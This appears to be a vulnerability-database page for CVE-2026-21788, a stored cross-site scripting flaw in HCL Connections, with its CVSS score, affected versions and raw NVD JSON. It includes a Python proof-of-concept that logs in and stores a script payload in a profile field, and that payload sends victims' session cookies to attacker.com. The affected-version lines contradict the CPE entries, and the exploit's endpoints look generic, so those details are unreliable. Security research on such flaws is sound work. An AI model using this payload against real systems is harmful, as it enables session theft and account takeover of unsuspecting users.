Security Vulnerability Report
CVE-2026-21788 CVSS 5.4 MEDIUM

CVE-2026-21788

Published: 2026-03-19 09:16:17
Last Modified: 2026-03-19 18:42:41

Description

HCL Connections is vulnerable to a cross-site scripting attack: an attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user. This may allow the attacker to steal cookie-based authentication credentials, compromise the user's account and then launch other attacks.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:hcltech:connections:8.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hcltech:connections:8.0:cumulative_release1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hcltech:connections:8.0:cumulative_release10:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hcltech:connections:8.0:cumulative_release11:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hcltech:connections:8.0:cumulative_release12:*:*:*:*:*:* - VULNERABLE
HCL Connections < 7.0.0
HCL Connections 6.0.x
HCL Connections 5.5.x
HCL Connections 5.0.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import argparse

# CVE-2026-21788 PoC - Stored XSS in HCL Connections
# Target: HCL Connections
# Vulnerability: Cross-Site Scripting (XSS)


def exploit_xss(target_url, username, password):
    """
    Exploit stored XSS vulnerability in HCL Connections
    This PoC demonstrates how to inject malicious JavaScript
    """
    login_url = f"{target_url}/login"

    # Malicious XSS payload
    xss_payload = '<script>document.location="http://attacker.com/steal?cookie="+document.cookie</script>'

    # Step 1: Authenticate with low-privilege account
    session = requests.Session()
    login_data = {
        'username': username,
        'password': password
    }
    response = session.post(login_url, data=login_data)

    if response.status_code == 200:
        # Step 2: Inject XSS payload in profile or configuration field
        inject_url = f"{target_url}/profiles/profileEdit"
        inject_data = {
            'aboutMe': xss_payload,  # Injecting into aboutMe field
            'submit': 'save'
        }
        inject_response = session.post(inject_url, data=inject_data)

        if inject_response.status_code == 200:
            print("[+] XSS payload injected successfully")
            print(f"[+] Payload stored in: {inject_url}")
            print("[+] When victim visits the page, cookie will be stolen")
    else:
        print("[-] Authentication failed")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CVE-2026-21788 PoC')
    parser.add_argument('--url', required=True, help='Target HCL Connections URL')
    parser.add_argument('--user', required=True, help='Username')
    # 'pass' is a Python keyword, so args.pass is a syntax error; map the flag to args.password instead
    parser.add_argument('--pass', dest='password', required=True, help='Password')
    args = parser.parse_args()
    exploit_xss(args.url, args.user, args.password)
```

References

https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129107 (Vendor Advisory)
Raw JSON Data

```json
{"cve": {"id": "CVE-2026-21788", "sourceIdentifier": "[email protected]", "published": "2026-03-19T09:16:16.950", "lastModified": "2026-03-19T18:42:41.013", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL Connections is vulnerable to a cross-site scripting attack where an attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user which leads to executing malicious script code.  This may allow the attacker steal cookie-based authentication credentials and comprise user's account then launch other attacks."}, {"lang": "es", "value": "HCL Connections es vulnerable a un ataque de cross-site scripting donde un atacante puede aprovechar este problema para ejecutar código de script arbitrario en el navegador de un usuario desprevenido, lo que lleva a la ejecución de código de script malicioso. Esto puede permitir al atacante robar credenciales de autenticación basadas en cookies y comprometer la cuenta del usuario para luego lanzar otros ataques."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:connections:8.0:-:*:*:*:*:*:*", "matchCriteriaId": "65CA8438-B6A6-4B36-826D-8625AACBC8FE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:connections:8.0:cumulative_release1:*:*:*:*:*:*", "matchCriteriaId": "BF707A30-B342-43F2-A390-60E8FA8384D5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:connections:8.0:cumulative_release10:*:*:*:*:*:*", "matchCriteriaId": "718ED7EC-3899-448D-B661-39463F5F71D2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:connections:8.0:cumulative_release11:*:*:*:*:*:*", "matchCriteriaId": "FFA414A1-C353-427F-B4EC-ED5BFC13EAF9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:connections:8.0:cumulative_release12:*:*:*:*:*:*", "matchCriteriaId": "5A5A7E4B-9BDE-432E-8FAB-7CD8F1A2A81A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:connections:8.0:cumulative_release2:*:*:*:*:*:*", "matchCriteriaId": "294AE19B-3678-49C3-8613-A9331C5C1481"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:connections:8.0:cumulative_release3:*:*:*:*:*:*", "matchCriteriaId": "773D1288-DF28-43F3-9517-B176DD840A8C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:connections:8.0:cumulative_release4:*:*:*:*:*:*", "matchCriteriaId": "7FCB8E35-3FFA-42FA-8AEB-A2DD22D809C9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:connections:8.0:cumulative_release5:*:*:*:*:*:*", "matchCriteriaId": "8948C358-B168-45E3-BC9F-E5DA4DD56203"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:connections:8.0:cumulative_release6:*:*:*:*:*:*", "matchCriteriaId": "C6879F00-1C87-44A6-83DF-A1DC80A85A88"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:connections:8.0:cumulative_release7:*:*:*:*:*:*", "matchCriteriaId": "28450E88-8377-4B0D-9383-B34C9EF28CC9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:connections:8.0:cumulative_release8:*:*:*:*:*:*", "matchCriteriaId": "13C3274C-0784-4C88-9A2D-D7AAE3D9FC2E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:connections:8.0:cumulative_release9:*:*:*:*:*:*", "matchCriteriaId": "F3848284-F133-4B35-AC04-9E4FFB17EDF8"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129107", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```